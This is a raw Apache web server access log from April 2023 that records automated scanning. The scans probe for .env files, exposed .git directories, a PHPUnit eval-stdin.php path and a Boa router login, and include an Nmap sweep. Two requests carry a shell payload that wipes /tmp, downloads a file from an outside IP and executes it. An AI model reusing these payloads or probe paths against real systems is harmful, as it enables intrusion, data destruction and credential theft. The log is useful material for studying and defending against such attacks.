184.73.78.62 - - [02/Apr/2023:23:50:23 +0000] "POST / HTTP/1.1" 405 409679 "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
184.73.78.62 - - [02/Apr/2023:23:50:25 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
43.154.128.189 - - [03/Apr/2023:00:35:46 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [03/Apr/2023:01:26:55 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [03/Apr/2023:01:26:56 +0000] "POST / HTTP/1.1" 405 409703 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [03/Apr/2023:01:55:34 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [03/Apr/2023:02:00:54 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
44.234.254.159 - - [03/Apr/2023:02:05:12 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
135.125.217.54 - - [03/Apr/2023:02:22:14 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [03/Apr/2023:02:22:14 +0000] "POST / HTTP/1.1" 405 409745 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.91.199.173 - - [03/Apr/2023:02:24:57 +0000] "GET /.git/HEAD HTTP/1.1" 200 - "-" "Python-urllib/3.9"
::1 - - [03/Apr/2023:02:36:58 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:36:59 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:00 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:02 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:15 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:16 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:17 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:02:37:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
94.102.61.10 - - [03/Apr/2023:02:42:49 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "python-requests/2.26.0"
94.102.61.10 - - [03/Apr/2023:02:42:49 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "python-requests/2.26.0"
94.102.61.10 - - [03/Apr/2023:02:42:50 +0000] "GET / HTTP/1.1" 200 8386 "-" "python-requests/2.26.0"
172.105.128.12 - - [03/Apr/2023:02:45:45 +0000] "\x16\x03\x01" 400 226 "-" "-"
184.73.78.62 - - [03/Apr/2023:02:58:08 +0000] "POST / HTTP/1.1" 405 409675 "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
184.73.78.62 - - [03/Apr/2023:02:58:10 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
134.209.217.121 - - [03/Apr/2023:03:01:12 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
154.209.125.58 - - [03/Apr/2023:03:02:26 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
154.209.125.115 - - [03/Apr/2023:03:02:26 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
154.209.125.115 - - [03/Apr/2023:03:02:27 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
196.200.32.64 - - [03/Apr/2023:03:13:36 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+161.35.208.230/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
43.154.128.189 - - [03/Apr/2023:03:14:18 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
102.222.70.32 - - [03/Apr/2023:03:14:50 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+161.35.208.230/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
135.125.217.54 - - [03/Apr/2023:03:16:45 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [03/Apr/2023:03:16:45 +0000] "POST / HTTP/1.1" 405 409719 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.91.199.173 - - [03/Apr/2023:03:25:11 +0000] "GET /.git/HEAD HTTP/1.1" 200 - "-" "Python-urllib/3.9"
198.235.24.16 - - [03/Apr/2023:03:42:46 +0000] "\x16\x03\x01" 400 226 "-" "-"
193.32.162.159 - - [03/Apr/2023:03:48:34 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
::1 - - [03/Apr/2023:03:59:09 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:11 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:12 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:26 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:28 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:33 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:35 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:03:59:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
43.154.128.189 - - [03/Apr/2023:04:32:47 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.105.128.12 - - [03/Apr/2023:04:50:16 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.217.54 - - [03/Apr/2023:04:59:55 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [03/Apr/2023:04:59:55 +0000] "POST / HTTP/1.1" 405 409729 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
16.162.164.155 - - [03/Apr/2023:05:08:12 +0000] "GET /api/pay/query_order HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.68 Safari/534.30"
16.162.164.155 - - [03/Apr/2023:05:08:13 +0000] "GET /api/auth HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/13.0.782.215)"
128.1.248.26 - - [03/Apr/2023:05:14:34 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.32.162.159 - - [03/Apr/2023:05:46:02 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [03/Apr/2023:05:51:30 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
20.171.30.204 - - [03/Apr/2023:06:00:45 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.171.30.204 - - [03/Apr/2023:06:00:46 +0000] "POST /_profiler/phpinfo HTTP/1.1" 405 411850 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.171.30.204 - - [03/Apr/2023:06:00:48 +0000] "GET /sendgrid/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.171.30.204 - - [03/Apr/2023:06:00:48 +0000] "POST /_profiler/phpinfo HTTP/1.1" 405 411828 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [03/Apr/2023:06:44:51 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.177.242 - - [03/Apr/2023:06:53:58 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
135.125.244.48 - - [03/Apr/2023:06:55:38 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:06:55:39 +0000] "POST / HTTP/1.1" 405 409719 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:07:00:21 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:07:00:21 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [03/Apr/2023:07:10:21 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
27.124.12.16 - - [03/Apr/2023:07:18:48 +0000] "GET /tvplay/155848.html HTTP/1.1" 200 - "/tvplay/155848.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
::1 - - [03/Apr/2023:07:28:28 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:29 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:34 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:45 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:46 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:47 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:48 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:49 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:50 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:51 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:52 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:53 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:54 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:07:28:55 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
34.76.158.233 - - [03/Apr/2023:07:32:26 +0000] "GET / HTTP/1.1" 200 8383 "-" "python-requests/2.28.2"
18.237.21.237 - - [03/Apr/2023:07:35:25 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
18.237.21.237 - - [03/Apr/2023:07:35:25 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.102.61.10 - - [03/Apr/2023:08:06:32 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
107.170.243.13 - - [03/Apr/2023:08:12:52 +0000] "GET / HTTP/1.1" 200 8387 "-" "Mozilla/5.0 zgrab/0.x"
116.68.110.46 - - [03/Apr/2023:08:15:25 +0000] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 200 - "-" "-"
71.6.232.22 - - [03/Apr/2023:08:25:56 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
43.154.128.189 - - [03/Apr/2023:08:29:13 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:08:50:58 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:08:50:58 +0000] "POST / HTTP/1.1" 405 409701 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.181.104 - - [03/Apr/2023:08:56:57 +0000] "\x16\x03\x01" 400 226 "-" "-"
185.254.196.173 - - [03/Apr/2023:09:40:43 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [03/Apr/2023:09:47:58 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
::1 - - [03/Apr/2023:09:59:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:10:14:57 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:10:14:58 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:10:14:59 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:10:15:00 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:10:15:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:10:15:02 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:10:15:03 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
135.125.244.48 - - [03/Apr/2023:10:47:54 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:10:47:54 +0000] "POST / HTTP/1.1" 405 409695 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.33.80.243 - - [03/Apr/2023:10:55:23 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [03/Apr/2023:11:06:41 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.104.242.173 - - [03/Apr/2023:11:08:02 +0000] "GET /0bef HTTP/1.0" 200 - "-" "-"
135.125.244.48 - - [03/Apr/2023:11:53:30 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:11:53:31 +0000] "POST / HTTP/1.1" 405 409711 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.77.247.119 - - [03/Apr/2023:11:53:44 +0000] "POST /public/.env HTTP/1.1" 405 411565 "-" "curl/7.64.0"
193.32.162.159 - - [03/Apr/2023:12:03:55 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.96.137.7 - - [03/Apr/2023:12:10:27 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
195.96.137.7 - - [03/Apr/2023:12:10:35 +0000] "GET /nmaplowercheck1680523835 HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:35 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:35 +0000] "POST /sdk HTTP/1.1" 405 406195 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:36 +0000] "GET /NmapUpperCheck1680523835 HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:36 +0000] "GET /base.shtml HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:36 +0000] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:36 +0000] "GET /server-status HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:36 +0000] "GET /Portal0000.htm HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /Nmap/folder/check1680523835 HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:36 +0000] "POST /scripts/WPnBr.dll HTTP/1.1" 405 407299 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /indice.jsa HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /Portal/Portal.mwsl HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /FXJt HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /__Additional HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /.git/HEAD HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /CSS/Miniweb.css HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /docs/cplugError.html/ HTTP/1.1" 301 287 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 44149 "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:37 +0000] "GET /localstart.shtml HTTP/1.1" 200 - "-" "curl/7.54.0"
195.96.137.7 - - [03/Apr/2023:12:10:38 +0000] "GET / HTTP/1.0" 200 41463 "-" "-"
195.96.137.7 - - [03/Apr/2023:12:10:38 +0000] "GET / HTTP/1.1" 200 44149 "-" "curl/7.54.0"
